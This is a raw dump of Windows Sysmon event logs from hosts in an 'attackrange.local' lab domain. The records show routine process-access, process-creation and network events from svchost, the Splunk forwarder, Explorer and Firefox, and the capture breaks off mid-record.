08:04:31.817{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083900Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.817{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083899Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.817{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083898Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.817{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083897Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.817{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083896Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.817{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083895Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.817{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B58F-615A-A501-00000000FD01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083894Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.817{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B58F-615A-A501-00000000FD01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083893Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.818{2FDD8D40-B58F-615A-A501-00000000FD01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000083892Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:29.469{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50201-false10.0.1.12-8089- 10341000x800000000000000083891Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.317{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B58F-615A-A401-00000000FD01}2560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083890Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.317{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083889Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.317{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083888Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.317{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083887Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.317{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083886Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.317{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083885Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.317{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083884Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.317{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083883Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.317{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083882Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.317{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083881Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.317{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B58F-615A-A401-00000000FD01}2560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083880Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.317{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B58F-615A-A401-00000000FD01}2560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083879Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.318{2FDD8D40-B58F-615A-A401-00000000FD01}2560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000108432Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:32.862{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108431Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:32.861{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108430Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:32.568{58E9C193-AE68-615A-C800-00000000FC01}45484124C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55a10|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF8039A66F8A8)|UNKNOWN(FFFFA5175A805B48)|UNKNOWN(FFFFA5175A805CC7)|UNKNOWN(FFFFA5175A800351)|UNKNOWN(FFFFA5175A801D1A)|UNKNOWN(FFFFA5175A7FFFD6)|UNKNOWN(FFFFF8039A387103)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5927b|C:\Windows\System32\SHELL32.dll+dac2a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000108429Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:32.568{58E9C193-AE68-615A-C800-00000000FC01}45484124C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+554f1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF8039A66F8A8)|UNKNOWN(FFFFA5175A805B48)|UNKNOWN(FFFFA5175A805CC7)|UNKNOWN(FFFFA5175A800351)|UNKNOWN(FFFFA5175A801D1A)|UNKNOWN(FFFFA5175A7FFFD6)|UNKNOWN(FFFFF8039A387103)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5927b|C:\Windows\System32\SHELL32.dll+dac2a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000108428Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:32.568{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla 